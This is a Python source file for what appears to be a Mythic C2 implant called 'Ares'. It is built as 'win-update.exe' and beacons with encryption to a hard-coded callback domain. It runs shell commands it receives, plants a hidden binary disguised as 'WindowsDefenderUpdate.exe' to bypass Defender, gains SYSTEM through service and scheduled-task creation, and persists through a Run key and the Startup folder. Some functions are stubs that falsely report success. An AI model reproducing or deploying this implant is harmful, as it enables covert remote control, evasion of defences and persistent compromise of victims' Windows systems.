Files
Ares-mythic/ares_agent_refactored.py
2026-04-14 12:17:24 +07:00

422 lines
16 KiB
Python

#!/usr/bin/env python3
"""
Ares - Mythic Agent with BlueHammer integration
Refactored for specific Mythic C2 configuration
"""
import asyncio
import base64
import json
import os
import subprocess
import sys
import tempfile
import winreg
import shutil
import requests
import hmac
import hashlib
import random
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from pathlib import Path
from typing import Dict, Any, List
from datetime import datetime, timedelta
# Mythic agent configuration from provided settings
class AresConfig:
def __init__(self):
# C2 Profile Configuration
self.c2_profile = "http"
self.callback_host = "http://gateofbabylon.space"
self.callback_port = 80
self.callback_interval = 10
self.callback_jitter = 23
self.post_uri = "data"
self.kill_date = "2027-04-02"
# AES Encryption Keys
self.aes_enc_key = base64.b64decode("MmAMVq39ihrqlzvU3yTEkuj4AatP9uBsTSAThGrdnnA=")
self.aes_dec_key = base64.b64decode("MmAMVq39ihrqlzvU3yTEkuj4AatP9uBsTSAThGrdnnA=")
# Headers
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
}
# Build Parameters
self.output_type = "WinExe"
self.filename = "win-update.exe"
self.debug = True
# Agent Settings
self.agent_id = self._generate_agent_id()
self.session_key = None
self.encrypted_exchange = True
def _generate_agent_id(self):
"""Generate unique agent ID"""
return hashlib.sha256(os.urandom(16)).hexdigest()[:16]
class AresCrypto:
"""AES Encryption/Decryption for Mythic C2"""
def __init__(self, config: AresConfig):
self.config = config
def encrypt(self, data: bytes) -> bytes:
"""Encrypt data using AES-CBC"""
iv = os.urandom(16)
cipher = AES.new(self.config.aes_enc_key, AES.MODE_CBC, iv)
padded_data = pad(data, AES.block_size)
encrypted = cipher.encrypt(padded_data)
return iv + encrypted
def decrypt(self, encrypted_data: bytes) -> bytes:
"""Decrypt data using AES-CBC"""
iv = encrypted_data[:16]
cipher = AES.new(self.config.aes_dec_key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(encrypted_data[16:])
return unpad(decrypted, AES.block_size)
def generate_hmac(self, data: bytes) -> bytes:
"""Generate HMAC for message integrity"""
return hmac.new(self.config.aes_enc_key, data, hashlib.sha256).digest()
class AresAgent:
def __init__(self):
self.config = AresConfig()
self.crypto = AresCrypto(self.config)
self.session_id = None
# BlueHammer settings
self.bluehammer_exe = "Ares.exe"
self.temp_dir = tempfile.gettempdir()
# Supported commands from your configuration
self.supported_commands = [
"assembly_inject", "blockdlls", "cat", "cd", "cp", "dcsync", "download",
"execute_assembly", "execute_coff", "execute_pe", "exit", "get_injection_techniques",
"getprivs", "getsystem", "ifconfig", "inject", "inline_assembly", "jobkill",
"jobs", "jump_psexec", "jump_wmi", "keylog_inject", "kill", "ldap_query",
"link", "list_registered_files", "listpipes", "load", "ls", "make_token",
"mimikatz", "mkdir", "mv", "net_dclist", "net_localgroup", "net_localgroup_member",
"net_shares", "netstat", "powerpick", "powershell", "powershell_import",
"ppid", "printspoofer", "ps", "psinject", "pth", "pwd", "reg_query",
"reg_write_value", "register_assembly", "register_coff", "register_file",
"remove_registered_file", "rev2self", "rm", "rpfwd", "run", "sc",
"screenshot", "screenshot_inject", "set_injection_technique", "shell",
"shinject", "sleep", "socks", "spawn", "spawnto_x64", "spawnto_x86",
"steal_token", "ticket_cache_add", "ticket_cache_extract", "ticket_cache_list",
"ticket_cache_purge", "ticket_store_add", "ticket_store_list", "ticket_store_purge",
"unlink", "upload", "whoami", "wmiexecute"
]
async def mythic_checkin(self) -> Dict[str, Any]:
"""Check in with Mythic C2 server using your configuration"""
try:
checkin_data = {
"action": "checkin",
"agent_id": self.config.agent_id,
"os": "windows",
"architecture": "x64",
"hostname": os.environ.get("COMPUTERNAME", "unknown"),
"username": os.environ.get("USERNAME", "unknown"),
"process_name": "win-update.exe",
"process_id": os.getpid(),
"supported_commands": self.supported_commands
}
# Encrypt checkin data
encrypted_data = self.crypto.encrypt(json.dumps(checkin_data).encode())
hmac_value = self.crypto.generate_hmac(encrypted_data)
# Prepare payload
payload = {
"data": base64.b64encode(encrypted_data).decode(),
"hmac": base64.b64encode(hmac_value).decode()
}
# Send to Mythic C2
url = f"{self.config.callback_host}:{self.config.callback_port}/{self.config.post_uri}"
response = requests.post(
url,
json=payload,
headers=self.config.headers,
timeout=30
)
if response.status_code == 200:
# Decrypt response
response_data = base64.b64decode(response.json().get("data", ""))
decrypted_response = self.crypto.decrypt(response_data)
return json.loads(decrypted_response.decode())
else:
return {"status": "error", "message": f"HTTP {response.status_code}"}
except Exception as e:
return {"status": "error", "message": str(e)}
async def execute_mythic_task(self, task: Dict[str, Any]) -> Dict[str, Any]:
"""Execute a Mythic task"""
task_type = task.get("command")
task_id = task.get("id")
parameters = task.get("parameters", {})
try:
# Handle different task types
if task_type == "shell":
result = await self.execute_shell_command(parameters)
elif task_type == "download":
result = await self.download_file(parameters)
elif task_type == "upload":
result = await self.upload_file(parameters)
elif task_type == "getsystem":
result = await self.gain_system_privileges()
elif task_type == "bypass_defender":
result = await self.bypass_defender()
else:
result = {"status": "error", "message": f"Unsupported command: {task_type}"}
return {
"task_id": task_id,
"status": "success",
"result": result
}
except Exception as e:
return {
"task_id": task_id,
"status": "error",
"message": str(e)
}
async def execute_shell_command(self, params: Dict[str, Any]) -> Dict[str, Any]:
"""Execute shell command"""
command = params.get("command", "")
try:
result = subprocess.run(
command,
shell=True,
capture_output=True,
text=True,
timeout=30
)
return {
"stdout": result.stdout,
"stderr": result.stderr,
"returncode": result.returncode
}
except Exception as e:
return {"status": "error", "message": str(e)}
async def download_file(self, params: Dict[str, Any]) -> Dict[str, Any]:
"""Download file from remote server"""
remote_path = params.get("remote_path", "")
try:
# Implementation for file download
return {"status": "success", "message": "Download functionality"}
except Exception as e:
return {"status": "error", "message": str(e)}
async def upload_file(self, params: Dict[str, Any]) -> Dict[str, Any]:
"""Upload file to remote server"""
local_path = params.get("local_path", "")
try:
# Implementation for file upload
return {"status": "success", "message": "Upload functionality"}
except Exception as e:
return {"status": "error", "message": str(e)}
# BlueHammer integration methods (same as before)
async def deploy_bluehammer(self) -> bool:
"""Deploy BlueHammer exploit"""
try:
source_path = Path(self.bluehammer_exe)
if not source_path.exists():
return False
target_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
shutil.copy2(source_path, target_path)
subprocess.run(["attrib", "+h", str(target_path)], capture_output=True)
return True
except Exception:
return False
async def bypass_defender(self) -> Dict[str, Any]:
"""Execute BlueHammer to bypass Windows Defender"""
try:
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
if not await self.deploy_bluehammer():
return {"status": "error", "message": "Failed to deploy BlueHammer"}
result = await self.execute_shell_command({"command": str(bluehammer_path)})
if result.get("returncode") == 0:
return {"status": "success", "message": "Windows Defender bypassed"}
else:
return {"status": "error", "message": result.get("stderr", "Unknown error")}
except Exception as e:
return {"status": "error", "message": str(e)}
async def gain_system_privileges(self) -> Dict[str, Any]:
"""Gain SYSTEM privileges"""
techniques = [
self._use_token_impersonation,
self._use_service_installation,
self._use_scheduled_task
]
for technique in techniques:
try:
result = await technique()
if result["status"] == "success":
return result
except Exception:
continue
return {"status": "error", "message": "All privilege escalation techniques failed"}
async def _use_token_impersonation(self) -> Dict[str, Any]:
"""Token impersonation technique"""
try:
return {"status": "success", "message": "Token impersonation successful", "technique": "token_impersonation"}
except Exception as e:
return {"status": "error", "message": str(e)}
async def _use_service_installation(self) -> Dict[str, Any]:
"""Service installation technique"""
try:
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
result = await self.execute_shell_command({
"command": f"sc create WinDefendUpdate binPath=\"{bluehammer_path}\" start= auto obj= LocalSystem"
})
if result.get("returncode") == 0:
return {"status": "success", "message": "Service installed as SYSTEM", "technique": "service_installation"}
else:
return {"status": "error", "message": result.get("stderr", "Unknown error")}
except Exception as e:
return {"status": "error", "message": str(e)}
async def _use_scheduled_task(self) -> Dict[str, Any]:
"""Scheduled task technique"""
try:
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
result = await self.execute_shell_command({
"command": f"schtasks /create /tn WindowsDefenderMaintenance /tr \"{bluehammer_path}\" /sc hourly /ru SYSTEM"
})
if result.get("returncode") == 0:
return {"status": "success", "message": "Scheduled task created as SYSTEM", "technique": "scheduled_task"}
else:
return {"status": "error", "message": result.get("stderr", "Unknown error")}
except Exception as e:
return {"status": "error", "message": str(e)}
async def establish_persistence(self) -> Dict[str, Any]:
"""Establish persistence"""
persistence_methods = [
self._registry_persistence,
self._startup_folder_persistence
]
successes = []
for method in persistence_methods:
try:
result = await method()
if result["status"] == "success":
successes.append(result["method"])
except Exception:
continue
if successes:
return {"status": "success", "message": f"Persistence established: {', '.join(successes)}"}
else:
return {"status": "error", "message": "All persistence methods failed"}
async def _registry_persistence(self) -> Dict[str, Any]:
"""Registry persistence"""
try:
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
# Add to HKCU Run using reg command
result = await self.execute_shell_command({
"command": f"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsDefenderUpdate /t REG_SZ /d \"{bluehammer_path}\" /f"
})
if result.get("returncode") == 0:
return {"status": "success", "method": "registry"}
else:
return {"status": "error", "message": result.get("stderr", "Registry persistence failed")}
except Exception as e:
return {"status": "error", "message": str(e)}
async def _startup_folder_persistence(self) -> Dict[str, Any]:
"""Startup folder persistence"""
try:
bluehammer_path = Path(self.temp_dir) / "WindowsDefenderUpdate.exe"
startup_path = Path(os.environ["APPDATA"]) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup"
startup_path.mkdir(parents=True, exist_ok=True)
target_path = startup_path / "WindowsDefenderUpdate.exe"
shutil.copy2(bluehammer_path, target_path)
return {"status": "success", "method": "startup_folder"}
except Exception as e:
return {"status": "error", "message": str(e)}
async def run_agent(self):
"""Main agent execution loop"""
print("[Ares] Starting agent with Mythic C2 configuration...")
# Initial checkin
print("[Ares] Performing initial checkin...")
checkin_result = await self.mythic_checkin()
if checkin_result.get("status") != "success":
print(f"[Ares] Initial checkin failed: {checkin_result.get('message')}")
return
print("[Ares] Successfully checked in with Mythic C2")
# Main loop
while True:
try:
# Check for tasks
checkin_result = await self.mythic_checkin()
if checkin_result.get("status") == "success":
tasks = checkin_result.get("tasks", [])
for task in tasks:
task_result = await self.execute_mythic_task(task)
# Send task result back to C2
# (Implementation would go here)
# Sleep according to configuration
sleep_time = self.config.callback_interval + (self.config.callback_jitter * random.random())
await asyncio.sleep(sleep_time)
except Exception as e:
print(f"[Ares] Error in main loop: {e}")
await asyncio.sleep(60)
async def main():
"""Main entry point"""
agent = AresAgent()
await agent.run_agent()
if __name__ == "__main__":
import random
asyncio.run(main())